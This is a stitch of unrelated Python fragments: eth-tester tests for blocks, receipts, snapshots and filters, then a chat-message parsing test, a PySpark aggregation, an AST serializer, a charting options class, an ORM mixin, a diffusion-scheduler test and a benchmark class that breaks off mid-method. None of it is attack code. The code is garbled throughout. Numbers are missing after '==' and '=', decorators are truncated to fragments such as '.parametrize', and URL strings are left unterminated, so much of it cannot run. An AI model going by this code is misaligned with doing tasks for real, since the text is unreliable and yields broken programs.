assert (block['hash'] == block_hash)
def test_get_block_by_hash_full_transactions(self, eth_tester):
eth_tester.mine_blocks(2)
transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
transaction = eth_tester.get_transaction_by_hash(transaction_hash)
block = eth_tester.get_block_by_hash(transaction['block_hash'], full_transactions=True)
assert is_dict(block['transactions'][0])
def test_get_block_by_hash_only_transaction_hashes(self, eth_tester):
eth_tester.mine_blocks(2)
transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
transaction = eth_tester.get_transaction_by_hash(transaction_hash)
block = eth_tester.get_block_by_hash(transaction['block_hash'], full_transactions=False)
assert is_hex(block['transactions'][0])
def test_get_block_by_earliest(self, eth_tester):
eth_tester.mine_blocks(10)
block = eth_tester.get_block_by_number('earliest')
assert (block['number'] == 0)
def test_get_block_by_latest_unmined_genesis(self, eth_tester):
block = eth_tester.get_block_by_number('latest')
assert (block['number'] == 0)
def test_get_block_by_latest_only_genesis(self, eth_tester):
block = eth_tester.get_block_by_number('latest')
assert (block['number'] == 0)
def test_get_block_by_latest(self, eth_tester):
origin_block_number = eth_tester.get_block_by_number('pending')['number']
eth_tester.mine_blocks(10)
block = eth_tester.get_block_by_number('latest')
assert (block['number'] == (9 + origin_block_number))
def test_get_block_by_pending(self, eth_tester):
origin_block_number = eth_tester.get_block_by_number('pending')['number']
eth_tester.mine_blocks(10)
block = eth_tester.get_block_by_number('pending')
assert (block['number'] == (10 + origin_block_number))
def test_get_block_missing(self, eth_tester):
with pytest.raises(BlockNotFound):
eth_tester.get_block_by_hash(('0x' + ('00' * 32)))
def test_get_transaction_by_hash(self, eth_tester):
transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
transaction = eth_tester.get_transaction_by_hash(transaction_hash)
assert (transaction['hash'] == transaction_hash)
def test_get_transaction_by_hash_for_unmined_transaction(self, eth_tester):
eth_tester.disable_auto_mine_transactions()
transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
transaction = eth_tester.get_transaction_by_hash(transaction_hash)
assert (transaction['hash'] == transaction_hash)
assert (transaction['block_hash'] is None)
def test_get_transaction_receipt_for_mined_transaction(self, eth_tester):
transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
receipt = eth_tester.get_transaction_receipt(transaction_hash)
assert (receipt['transaction_hash'] == transaction_hash)
assert (receipt['type'] == '0x2')
assert (receipt['effective_gas_price'] == )
.parametrize('type_specific_params,_type', (({'gas_price': }, '0x0'), ({'gas_price': , 'access_list': ({'address': '0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe', 'storage_keys': ()},)}, '0x1'), ({'max_fee_per_gas': , 'max_priority_fee_per_gas': , 'access_list': ({'address': '0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe', 'storage_keys': ()},)}, '0x2')))
def test_receipt_transaction_type_for_mined_transaction(self, eth_tester, type_specific_params, _type):
transaction_hash = eth_tester.send_transaction(merge({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 25000}, type_specific_params))
receipt = eth_tester.get_transaction_receipt(transaction_hash)
assert (receipt['transaction_hash'] == transaction_hash)
assert (receipt['type'] == _type)
def test_receipt_effective_gas_price_for_mined_transaction_legacy(self, eth_tester):
gas_price =
transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000, 'gas_price': gas_price})
receipt = eth_tester.get_transaction_receipt(transaction_hash)
assert (receipt['transaction_hash'] == transaction_hash)
assert (receipt['type'] == '0x0')
assert (receipt['effective_gas_price'] == gas_price)
def test_receipt_effective_gas_price_for_mined_transaction_base_fee_minimum(self, eth_tester):
priority_fee =
transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000, 'max_priority_fee_per_gas': priority_fee, 'max_fee_per_gas': (priority_fee * 2)})
receipt = eth_tester.get_transaction_receipt(transaction_hash)
base_fee = eth_tester.get_block_by_number(receipt['block_number'])['base_fee_per_gas']
assert (base_fee == )
assert (receipt['transaction_hash'] == transaction_hash)
assert (receipt['type'] == '0x2')
assert (receipt['effective_gas_price'] == (base_fee + priority_fee))
def test_receipt_effective_gas_price_for_mined_transaction_max_fee_minimum(self, eth_tester):
priority_fee =
max_fee = (priority_fee + 1)
transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000, 'max_priority_fee_per_gas': priority_fee, 'max_fee_per_gas': max_fee})
receipt = eth_tester.get_transaction_receipt(transaction_hash)
base_fee = eth_tester.get_block_by_number(receipt['block_number'])['base_fee_per_gas']
assert (base_fee == )
assert (receipt['transaction_hash'] == transaction_hash)
assert (receipt['type'] == '0x2')
assert (receipt['effective_gas_price'] == max_fee)
def test_get_transaction_receipt_for_unmined_transaction_raises(self, eth_tester):
eth_tester.disable_auto_mine_transactions()
transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000})
with pytest.raises(TransactionNotFound):
eth_tester.get_transaction_receipt(transaction_hash)
def test_call_return13(self, eth_tester):
self.skip_if_no_evm_execution()
math_address = _deploy_math(eth_tester)
call_math_transaction = _make_call_math_transaction(eth_tester, math_address, 'return13')
raw_result = eth_tester.call(call_math_transaction)
result = _decode_math_result('return13', raw_result)
assert (result == (13,))
def test_call_add(self, eth_tester):
self.skip_if_no_evm_execution()
math_address = _deploy_math(eth_tester)
call_math_transaction = _make_call_math_transaction(eth_tester, math_address, 'add', fn_args=(7, 13))
raw_result = eth_tester.call(call_math_transaction)
result = _decode_math_result('add', raw_result)
assert (result == (20,))
def test_call_query_previous_state(self, eth_tester):
self.skip_if_no_evm_execution()
math_address = _deploy_math(eth_tester)
call_math_transaction = _make_call_math_transaction(eth_tester, math_address, 'counter')
call_math_transaction_inc = _make_call_math_transaction(eth_tester, math_address, 'increment')
eth_tester.mine_blocks(2)
eth_tester.send_transaction(call_math_transaction_inc)
raw_result = eth_tester.call(call_math_transaction, 1)
result = _decode_math_result('counter', raw_result)
raw_result_new = eth_tester.call(call_math_transaction)
result_new = _decode_math_result('counter', raw_result_new)
assert (result == (0,))
assert (result_new == (1,))
def test_estimate_gas(self, eth_tester):
self.skip_if_no_evm_execution()
math_address = _deploy_math(eth_tester)
estimate_call_math_transaction = _make_call_math_transaction(eth_tester, math_address, 'increment')
gas_estimation = eth_tester.estimate_gas(estimate_call_math_transaction)
call_math_transaction = assoc(estimate_call_math_transaction, 'gas', gas_estimation)
transaction_hash = eth_tester.send_transaction(call_math_transaction)
receipt = eth_tester.get_transaction_receipt(transaction_hash)
assert (receipt['gas_used'] <= gas_estimation)
assert (receipt['gas_used'] >= (gas_estimation - 21000))
def test_estimate_gas_with_block_identifier(self, eth_tester):
self.skip_if_no_evm_execution()
gas_burner_address = _deploy_gas_burner(eth_tester)
estimate_call_gas_burner_transaction = _make_call_gas_burner_transaction(eth_tester, gas_burner_address, 'burnBlockNumberDependentGas')
latest_gas_estimation = eth_tester.estimate_gas(estimate_call_gas_burner_transaction, 'latest')
earliest_gas_estimation = eth_tester.estimate_gas(estimate_call_gas_burner_transaction, 'earliest')
assert (latest_gas_estimation > earliest_gas_estimation)
def test_can_call_after_exception_raised_calling(self, eth_tester):
self.skip_if_no_evm_execution()
throws_address = _deploy_throws(eth_tester, 'throw_contract')
call_will_throw_transaction = _make_call_throws_transaction(eth_tester, throws_address, 'throw_contract', 'willThrow')
with pytest.raises(TransactionFailed):
eth_tester.call(call_will_throw_transaction)
call_value_transaction = _make_call_throws_transaction(eth_tester, throws_address, 'throw_contract', 'value')
raw_result = eth_tester.call(call_value_transaction)
result = _decode_throws_result('throw_contract', 'value', raw_result)
assert (result == (1,))
def test_can_estimate_gas_after_exception_raised_estimating_gas(self, eth_tester):
self.skip_if_no_evm_execution()
throws_address = _deploy_throws(eth_tester, 'throw_contract')
call_will_throw_transaction = _make_call_throws_transaction(eth_tester, throws_address, 'throw_contract', 'willThrow')
with pytest.raises(TransactionFailed):
eth_tester.estimate_gas(dissoc(call_will_throw_transaction, 'gas'))
call_set_value_transaction = _make_call_throws_transaction(eth_tester, throws_address, 'throw_contract', 'setValue', fn_args=(2,))
gas_estimation = eth_tester.estimate_gas(dissoc(call_set_value_transaction, 'gas'))
assert gas_estimation
def test_revert_reason_message(self, eth_tester):
self.skip_if_no_evm_execution()
revert_address = _deploy_throws(eth_tester, 'revert_contract')
call_with_revert = _make_call_throws_transaction(eth_tester, revert_address, 'revert_contract', 'do_revert', fn_args=(True,))
call_without_revert = _make_call_throws_transaction(eth_tester, revert_address, 'revert_contract', 'do_revert', fn_args=(False,))
raw_result = eth_tester.call(call_without_revert)
result = _decode_throws_result('revert_contract', 'do_revert', raw_result)
assert (result[0] == 'No ribbert')
with pytest.raises(TransactionFailed) as excinfo:
eth_tester.call(call_with_revert)
assert ((len(excinfo.value.args) > 0) and (excinfo.value.args[0] == 'ribbert, ribbert'))
def test_genesis_snapshot_and_revert(self, eth_tester):
origin_latest = eth_tester.get_block_by_number('latest')['number']
origin_pending = eth_tester.get_block_by_number('pending')['number']
snapshot_id = eth_tester.take_snapshot()
eth_tester.mine_blocks(10)
assert (eth_tester.get_block_by_number('latest')['number'] == (origin_latest + 10))
assert (eth_tester.get_block_by_number('pending')['number'] == (origin_pending + 10))
eth_tester.revert_to_snapshot(snapshot_id)
assert (eth_tester.get_block_by_number('latest')['number'] == origin_latest)
assert (eth_tester.get_block_by_number('pending')['number'] == origin_pending)
def test_snapshot_and_revert_post_genesis(self, eth_tester):
eth_tester.mine_blocks(5)
origin_latest = eth_tester.get_block_by_number('latest')['number']
origin_pending = eth_tester.get_block_by_number('pending')['number']
snapshot_id = eth_tester.take_snapshot()
eth_tester.mine_blocks(10)
assert (eth_tester.get_block_by_number('latest')['number'] == (origin_latest + 10))
assert (eth_tester.get_block_by_number('pending')['number'] == (origin_pending + 10))
eth_tester.revert_to_snapshot(snapshot_id)
assert (eth_tester.get_block_by_number('latest')['number'] == origin_latest)
assert (eth_tester.get_block_by_number('pending')['number'] == origin_pending)
def test_revert_cleans_up_invalidated_pending_block_filters(self, eth_tester):
eth_tester.mine_blocks(2)
filter_a_id = eth_tester.create_block_filter()
filter_b_id = eth_tester.create_block_filter()
common_blocks = set(eth_tester.mine_blocks(2))
snapshot_id = eth_tester.take_snapshot()
fork_a_transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000, 'value': 1})
fork_a_transaction_block_hash = eth_tester.get_transaction_by_hash(fork_a_transaction_hash)['block_hash']
fork_a_blocks = eth_tester.mine_blocks(2)
before_revert_changes_logs_a = eth_tester.get_only_filter_changes(filter_a_id)
before_revert_all_logs_a = eth_tester.get_all_filter_logs(filter_a_id)
before_revert_all_logs_b = eth_tester.get_all_filter_logs(filter_b_id)
assert (common_blocks.intersection(before_revert_changes_logs_a) == common_blocks)
assert (common_blocks.intersection(before_revert_all_logs_a) == common_blocks)
assert (common_blocks.intersection(before_revert_all_logs_b) == common_blocks)
expected_before_block_hashes = common_blocks.union([fork_a_transaction_block_hash]).union(fork_a_blocks)
assert (set(before_revert_changes_logs_a) == expected_before_block_hashes)
assert (set(before_revert_changes_logs_a) == expected_before_block_hashes)
assert (set(before_revert_all_logs_a) == expected_before_block_hashes)
assert (set(before_revert_all_logs_b) == expected_before_block_hashes)
eth_tester.revert_to_snapshot(snapshot_id)
fork_b_transaction_hash = eth_tester.send_transaction({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000, 'value': 2})
fork_b_transaction_block_hash = eth_tester.get_transaction_by_hash(fork_b_transaction_hash)['block_hash']
fork_b_blocks = eth_tester.mine_blocks(2)
assert (not set(fork_a_blocks).intersection(fork_b_blocks))
after_revert_changes_logs_a = eth_tester.get_only_filter_changes(filter_a_id)
after_revert_changes_logs_b = eth_tester.get_only_filter_changes(filter_b_id)
after_revert_all_logs_a = eth_tester.get_all_filter_logs(filter_a_id)
after_revert_all_logs_b = eth_tester.get_all_filter_logs(filter_b_id)
expected_all_after_blocks = common_blocks.union([fork_b_transaction_block_hash]).union(fork_b_blocks)
expected_new_after_blocks = set(fork_b_blocks).union([fork_b_transaction_block_hash])
assert (set(after_revert_changes_logs_a) == expected_new_after_blocks)
assert (set(after_revert_changes_logs_b) == expected_all_after_blocks)
assert (set(after_revert_all_logs_a) == expected_all_after_blocks)
assert (set(after_revert_all_logs_b) == expected_all_after_blocks)
def test_revert_cleans_up_invalidated_pending_transaction_filters(self, eth_tester):
def _transaction(**kwargs):
return merge({'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000}, kwargs)
for _ in range(5):
eth_tester.send_transaction(_transaction())
filter_id = eth_tester.create_pending_transaction_filter()
common_transactions = {eth_tester.send_transaction(_transaction(value=1)), eth_tester.send_transaction(_transaction(value=2))}
snapshot_id = eth_tester.take_snapshot()
before_transactions = [eth_tester.send_transaction(_transaction(value=3)), eth_tester.send_transaction(_transaction(value=4)), eth_tester.send_transaction(_transaction(value=5))]
before_filter_changes = eth_tester.get_only_filter_changes(filter_id)
before_filter_logs = eth_tester.get_all_filter_logs(filter_id)
assert (set(before_filter_changes) == common_transactions.union(before_transactions))
assert (set(before_filter_logs) == common_transactions.union(before_transactions))
eth_tester.revert_to_snapshot(snapshot_id)
after_transactions = [eth_tester.send_transaction(_transaction(value=6)), eth_tester.send_transaction(_transaction(value=7)), eth_tester.send_transaction(_transaction(value=8))]
after_filter_changes = eth_tester.get_only_filter_changes(filter_id)
after_filter_logs = eth_tester.get_all_filter_logs(filter_id)
assert (set(after_filter_changes) == set(after_transactions))
assert (set(after_filter_logs) == common_transactions.union(after_transactions))
def test_revert_cleans_up_invalidated_log_entries(self, eth_tester):
self.skip_if_no_evm_execution()
emitter_address = _deploy_emitter(eth_tester)
def _emit(v):
return _call_emitter(eth_tester, emitter_address, 'logSingle', [EMITTER_ENUM['LogSingleWithIndex'], v])
_emit(1)
_emit(2)
filter_id = eth_tester.create_log_filter()
_emit(1)
_emit(2)
snapshot_id = eth_tester.take_snapshot()
_emit(3)
_emit(4)
_emit(5)
before_changes = eth_tester.get_only_filter_changes(filter_id)
before_all = eth_tester.get_all_filter_logs(filter_id)
assert (len(before_changes) == 5)
assert (len(before_all) == 5)
eth_tester.revert_to_snapshot(snapshot_id)
_emit(6)
_emit(7)
_emit(8)
_emit(9)
after_changes = eth_tester.get_only_filter_changes(filter_id)
after_all = eth_tester.get_all_filter_logs(filter_id)
assert (len(after_changes) == 4)
assert (len(after_all) == 6)
def test_reset_to_genesis(self, eth_tester):
origin_latest = eth_tester.get_block_by_number('latest')['number']
origin_pending = eth_tester.get_block_by_number('pending')['number']
eth_tester.mine_blocks(5)
assert (eth_tester.get_block_by_number('latest')['number'] == (origin_latest + 5))
assert (eth_tester.get_block_by_number('pending')['number'] == (origin_pending + 5))
eth_tester.reset_to_genesis()
assert (eth_tester.get_block_by_number('latest')['number'] == origin_latest)
assert (eth_tester.get_block_by_number('pending')['number'] == origin_pending)
def test_block_filter(self, eth_tester):
eth_tester.mine_blocks(10)
filter_a_id = eth_tester.create_block_filter()
blocks_10_to_14 = eth_tester.mine_blocks(5)
filter_b_id = eth_tester.create_block_filter()
blocks_15_to_22 = eth_tester.mine_blocks(8)
filter_a_changes_part_1 = eth_tester.get_only_filter_changes(filter_a_id)
filter_a_logs_part_1 = eth_tester.get_all_filter_logs(filter_a_id)
filter_b_logs_part_1 = eth_tester.get_all_filter_logs(filter_b_id)
assert (len(filter_a_changes_part_1) == 13)
assert (len(filter_a_logs_part_1) == 13)
assert (len(filter_b_logs_part_1) == 8)
assert (set(filter_a_changes_part_1) == set(filter_a_logs_part_1))
assert (set(filter_a_changes_part_1) == set(blocks_10_to_14).union(blocks_15_to_22))
assert (set(filter_b_logs_part_1) == set(blocks_15_to_22))
blocks_23_to_29 = eth_tester.mine_blocks(7)
filter_a_changes_part_2 = eth_tester.get_only_filter_changes(filter_a_id)
filter_b_changes = eth_tester.get_only_filter_changes(filter_b_id)
filter_a_logs_part_2 = eth_tester.get_all_filter_logs(filter_a_id)
filter_b_logs_part_2 = eth_tester.get_all_filter_logs(filter_b_id)
assert (len(filter_a_changes_part_2) == 7)
assert (len(filter_b_changes) == 15)
assert (len(filter_a_logs_part_2) == 20)
assert (len(filter_b_logs_part_2) == 15)
assert (set(filter_a_changes_part_2) == set(blocks_23_to_29))
assert (set(filter_b_changes) == set(blocks_15_to_22).union(blocks_23_to_29))
assert (set(filter_b_changes) == set(filter_b_logs_part_2))
assert (set(filter_a_logs_part_2) == set(blocks_10_to_14).union(blocks_15_to_22).union(blocks_23_to_29))
assert (set(filter_b_logs_part_2) == set(blocks_15_to_22).union(blocks_23_to_29))
def test_pending_transaction_filter(self, eth_tester):
transaction = {'from': eth_tester.get_accounts()[0], 'to': BURN_ADDRESS, 'gas': 21000}
for _ in range(5):
eth_tester.send_transaction(transaction)
filter_a_id = eth_tester.create_pending_transaction_filter()
transactions_0_to_7 = [eth_tester.send_transaction(transaction) for _ in range(8)]
filter_b_id = eth_tester.create_pending_transaction_filter()
transactions_8_to_12 = [eth_tester.send_transaction(transaction) for _ in range(5)]
filter_a_changes_part_1 = eth_tester.get_only_filter_changes(filter_a_id)
filter_a_logs_part_1 = eth_tester.get_all_filter_logs(filter_a_id)
filter_b_logs_part_1 = eth_tester.get_all_filter_logs(filter_b_id)
assert (set(filter_a_changes_part_1) == set(filter_a_logs_part_1))
assert (set(filter_a_changes_part_1) == set(transactions_0_to_7).union(transactions_8_to_12))
assert (set(filter_b_logs_part_1) == set(transactions_8_to_12))
transactions_13_to_20 = [eth_tester.send_transaction(transaction) for _ in range(7)]
filter_a_changes_part_2 = eth_tester.get_only_filter_changes(filter_a_id)
filter_b_changes = eth_tester.get_only_filter_changes(filter_b_id)
filter_a_logs_part_2 = eth_tester.get_all_filter_logs(filter_a_id)
filter_b_logs_part_2 = eth_tester.get_all_filter_logs(filter_b_id)
assert (len(filter_a_changes_part_2) == 7)
assert (len(filter_b_changes) == 12)
assert (len(filter_a_logs_part_2) == 20)
assert (len(filter_b_logs_part_2) == 12)
assert (set(filter_a_changes_part_2) == set(transactions_13_to_20))
assert (set(filter_b_changes) == set(filter_b_logs_part_2))
assert (set(filter_b_changes) == set(transactions_8_to_12).union(transactions_13_to_20))
assert (set(filter_a_logs_part_2) == set(transactions_0_to_7).union(transactions_8_to_12).union(transactions_13_to_20))
assert (set(filter_b_logs_part_2) == set(transactions_8_to_12).union(transactions_13_to_20))
.parametrize('filter_topics,expected', ([None, 1], [[], 1], [['0xf70fe689e290d8ce2b2a388ac28db36fbb0e16a6d89c6804c461f65a1b40bb15'], 1], [['0xf70fe689e290d8ce2b2a388ac28db36fbb0e16a6d89c6804c461f65a1b40bb15', None], 1], [['0xf70fe689e290d8ce2b2a388ac28db36fbb0e16a6d89c6804c461f65a1b40bb15', (('0x' + ('00' * 31)) + '02')], 1], [['0xf70fe689e290d8ce2b2a388ac28db36fbb0e16a6d89c6804c461f65a1b40bb15', (('0x' + ('00' * 31)) + '99')], 0], [[b'\xf7\x0f\xe6\x89\xe2\x90\xd8\xce+*8\x8a\xc2\x8d\xb3o\xbb\x0e\x16\xa6\xd8\x9ch\x04\xc4a\xf6Z\\xbb\x15'], 1]), ids=['filter None', 'filter []', 'filter Event only', 'filter Event and None', 'filter Event and argument', 'filter Event and wrong argument', 'filter Event only bytes'])
def test_log_filter_picks_up_new_logs(self, eth_tester, filter_topics, expected):
self.skip_if_no_evm_execution()
emitter_address = _deploy_emitter(eth_tester)
emit_a_hash = _call_emitter(eth_tester, emitter_address, 'logSingle', [EMITTER_ENUM['LogSingleWithIndex'], 1])
eth_tester.get_transaction_receipt(emit_a_hash)
filter_event = eth_tester.create_log_filter(topics=filter_topics)
_call_emitter(eth_tester, emitter_address, 'logSingle', [EMITTER_ENUM['LogSingleWithIndex'], 2])
specific_logs_changes = eth_tester.get_only_filter_changes(filter_event)
specific_logs_all = eth_tester.get_all_filter_logs(filter_event)
specific_direct_logs_all = eth_tester.get_logs(topics=filter_topics)
assert (len(specific_logs_changes) == expected)
assert (len(specific_logs_all) == expected)
assert (len(specific_direct_logs_all) == expected)
.parametrize('filter_topics', ('not a list', {}, 1, [1], [1, 2], [1, None], [None, 1], [encode_hex(((b'\x00' * 30) + b'\x01'))], [encode_hex(((b'\x00' * 32) + b'\x01'))]), ids=['filter string', 'filter dict', 'filter int', 'filter int in list', 'filter multiple ints in list', 'filter int and None in list', 'filter None and int in list', 'filter bytes with less than 32 bytes', 'filter bytes with more than 32 bytes'])
def test_log_filter_invalid_topics_throws_error(self, eth_tester, filter_topics):
self.skip_if_no_evm_execution()
emitter_address = _deploy_emitter(eth_tester)
_call_emitter(eth_tester, emitter_address, 'logSingle', [EMITTER_ENUM['LogSingleWithIndex'], 1])
with pytest.raises(ValidationError):
eth_tester.create_log_filter(from_block=0, topics=filter_topics)
def test_log_filter_includes_old_logs(self, eth_tester):
self.skip_if_no_evm_execution()
emitter_address = _deploy_emitter(eth_tester)
_call_emitter(eth_tester, emitter_address, 'logSingle', [EMITTER_ENUM['LogSingleWithIndex'], 1])
filter_any_id = eth_tester.create_log_filter(from_block=0)
_call_emitter(eth_tester, emitter_address, 'logSingle', [EMITTER_ENUM['LogSingleWithIndex'], 2])
logs_changes = eth_tester.get_only_filter_changes(filter_any_id)
logs_all = eth_tester.get_all_filter_logs(filter_any_id)
direct_logs_all = eth_tester.get_logs(from_block=0)
assert (len(logs_changes) == len(logs_all) == len(direct_logs_all) == 2)
def test_log_filter_includes_latest_block_with_to_block(self, eth_tester):
self.skip_if_no_evm_execution()
emitter_address = _deploy_emitter(eth_tester)
no_of_events = 2
for i in range(1, (no_of_events + 1)):
_call_emitter(eth_tester, emitter_address, 'logSingle', [EMITTER_ENUM['LogSingleWithIndex'], i])
filter_any_id = eth_tester.create_log_filter(from_block=0, to_block=eth_tester.get_block_by_number('latest')['number'])
logs_changes = eth_tester.get_only_filter_changes(filter_any_id)
logs_all = eth_tester.get_all_filter_logs(filter_any_id)
assert (len(logs_changes) == len(logs_all) == no_of_events)
def test_delete_filter(self, eth_tester):
self.skip_if_no_evm_execution()
filter_id = eth_tester.create_block_filter()
eth_tester.get_all_filter_logs(filter_id)
eth_tester.get_only_filter_changes(filter_id)
eth_tester.delete_filter(filter_id)
with pytest.raises(FilterNotFound):
eth_tester.get_all_filter_logs(filter_id)
with pytest.raises(FilterNotFound):
eth_tester.get_only_filter_changes(filter_id)
with pytest.raises(FilterNotFound):
eth_tester.delete_filter(filter_id)
with pytest.raises(FilterNotFound):
eth_tester.delete_filter(12345)
def test_receipt_gas_used_computation(self, eth_tester):
eth_tester.disable_auto_mine_transactions()
tx_hashes = []
for i in range(4):
tx = {'from': eth_tester.get_accounts()[i], 'to': eth_tester.get_accounts()[(i + 1)], 'gas': (((i + 1) * 20000) + 10000), 'value': 1}
tx_hash = eth_tester.send_transaction(tx)
tx_hashes.append(tx_hash)
eth_tester.mine_block()
cumulative_gas_used = 0
for tx_hash in tx_hashes:
receipt = eth_tester.get_transaction_receipt(tx_hash)
cumulative_gas_used += receipt['gas_used']
assert (receipt['gas_used'] == 21000)
assert (receipt['cumulative_gas_used'] == cumulative_gas_used)
def test_time_traveling(self, eth_tester):
eth_tester.mine_blocks(3)
before_block = eth_tester.get_block_by_number('pending')
eth_tester.time_travel((before_block['timestamp'] + 120))
after_block = eth_tester.get_block_by_number('pending')
assert (after_block['number'] == (before_block['number'] + 1))
assert ((before_block['timestamp'] + 120) == after_block['timestamp'])
def test_time_traveling_backwards_not_allowed(self, eth_tester):
eth_tester.mine_blocks(3)
before_timestamp = eth_tester.get_block_by_number('pending')['timestamp']
with pytest.raises(ValidationError):
eth_tester.time_travel((before_timestamp - 10))
.parametrize('test_transaction', (SIMPLE_TRANSACTION,), ids=['Simple transaction'])
def test_get_transaction_receipt_byzantium(self, eth_tester, test_transaction):
backend = eth_tester.backend.__class__()
byzantium_eth_tester = eth_tester.__class__(backend=backend)
accounts = byzantium_eth_tester.get_accounts()
assert accounts, 'No accounts available for transaction sending'
transaction = assoc(test_transaction, 'from', accounts[0])
txn_hash = byzantium_eth_tester.send_transaction(transaction)
txn = byzantium_eth_tester.get_transaction_receipt(txn_hash)
assert ('status' in txn)
assert (txn['status'] == 1)
def test_duplicate_log_entries(self, eth_tester):
self.skip_if_no_evm_execution()
emitter_address = _deploy_emitter(eth_tester)
def _emit(v):
return _call_emitter(eth_tester, emitter_address, 'logSingle', [EMITTER_ENUM['LogSingleWithIndex'], v])
filter_id_1 = eth_tester.create_log_filter(from_block=0)
assert (len(eth_tester.get_all_filter_logs(filter_id_1)) == 0)
_emit(1)
assert (len(eth_tester.get_all_filter_logs(filter_id_1)) == 1)
_emit(2)
assert (len(eth_tester.get_all_filter_logs(filter_id_1)) == 2)
filter_id_2 = eth_tester.create_log_filter(from_block=0)
assert (len(eth_tester.get_all_filter_logs(filter_id_1)) == 2)
assert (len(eth_tester.get_all_filter_logs(filter_id_2)) == 2) |
def test_admins_removed(session):
data = {'irisSeqId': '1111111', 'irisTags': ['DeltaAdminTextMessage', 'is_from_iris_fanout'], 'messageMetadata': {'actorFbId': '1234', 'adminText': 'You removed yourself as a group admin.', 'folderId': {'systemFolderId': 'INBOX'}, 'messageId': 'mid.$XYZ', 'offlineThreadingId': '', 'skipBumpThread': True, 'tags': ['source:titan:web'], 'threadKey': {'threadFbId': '4321'}, 'threadReadStateEffect': 'KEEP_AS_IS', 'timestamp': '', 'unsendType': 'deny_log_message'}, 'participants': ['1234', '2345', '3456'], 'requestContext': {'apiArgs': {}}, 'tqSeqId': '1111', 'type': 'change_thread_admins', 'untypedData': {'THREAD_CATEGORY': 'GROUP', 'TARGET_ID': '1234', 'ADMIN_TYPE': '0', 'ADMIN_EVENT': 'remove_admin'}, 'class': 'AdminTextMessage'}
assert (AdminsRemoved(author=User(session=session, id='1234'), thread=Group(session=session, id='4321'), removed=[User(session=session, id='1234')], at=datetime.datetime(2017, 7, 14, 2, 40, tzinfo=datetime.timezone.utc)) == parse_admin_message(session, data)) |
def get_companies_employees_activity(df: DataFrame, commits_id_field: str, author_email_field: str, company_field: str, result_field: str='Commits') -> DataFrame:
return df.select(f.col(commits_id_field), f.col(author_email_field), f.col(company_field)).groupBy(author_email_field, company_field).agg(f.count(f.col(commits_id_field)).alias(result_field)) |
class CaseNodeSerializer(AbstractSyntaxTreeNodeSerializer):
def serialize(self, node: CaseNode) -> Dict:
data = super().serialize(node)
data.update({'expression': self._pseudo.serialize(node.expression), 'constant': self._pseudo.serialize(node.constant), 'break_case': node.break_case})
return data
def deserialize(self, data: dict) -> CaseNode:
return CaseNode(expression=self._pseudo.deserialize(data['expression']), constant=self._pseudo.deserialize(data['constant']), reaching_condition=LogicCondition.deserialize(data['rc'], self._group.new_context), break_case=data['break_case']) |
class OptionSonificationGlobalcontexttracksMappingGapbetweennotes(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def value(self):
return self._config_get(None)
def value(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class ReferenceMixin(object):
def __init__(self, references=None, **kwargs):
if (references is None):
references = []
self.references = references
_attr
def references(cls):
secondary_table = create_secondary_table(cls.__name__, 'Link', cls.__tablename__, 'Links', ('%s_References' % cls.__name__))
return relationship('Link', secondary=secondary_table, doc='A list of :class:`.Link` instances given as a reference for\n this entity.\n ')
('references')
def _validate_references(self, key, reference):
from stalker.models.link import Link
if (not isinstance(reference, Link)):
raise TypeError(('All the elements in the %s.references should be stalker.models.link.Link instances not %s' % (self.__class__.__name__, reference.__class__.__name__)))
return reference |
def test_dpm_solver_diffusers():
from diffusers import DPMSolverMultistepScheduler as DiffuserScheduler
manual_seed(0)
diffusers_scheduler = DiffuserScheduler(beta_schedule='scaled_linear', beta_start=0.00085, beta_end=0.012)
diffusers_scheduler.set_timesteps(30)
refiners_scheduler = DPMSolver(num_inference_steps=30)
sample = randn(1, 3, 32, 32)
noise = randn(1, 3, 32, 32)
for (step, timestep) in enumerate(diffusers_scheduler.timesteps):
diffusers_output = cast(Tensor, diffusers_scheduler.step(noise, timestep, sample).prev_sample)
refiners_output = refiners_scheduler(x=sample, noise=noise, step=step)
assert allclose(diffusers_output, refiners_output, rtol=0.01), f'outputs differ at step {step}' |
class Benchmarks():
REPOS = os.path.join(_utils.HOME, 'repos')
PYPERFORMANCE = 'pyperformance'
PYSTON = 'pyston'
_SUITES: Dict[(str, Dict[(str, Any)])] = {PYPERFORMANCE: {'url': ' 'reldir': 'pyperformance/data-files/benchmarks', 'show_results': True}, PYSTON: {'url': ' 'reldir': 'benchmarks', 'show_results': True}}
SUITES: Dict[(str, BenchmarkSuiteInfo)] = {}
for _suitename in _SUITES:
SUITES[_suitename] = BenchmarkSuiteInfo(_suitename, **_SUITES[_suitename])
del _suitename
del _SUITES
def _load_suite(cls, suite: str) -> List[str]:
info = cls.SUITES[suite]
url = info.url
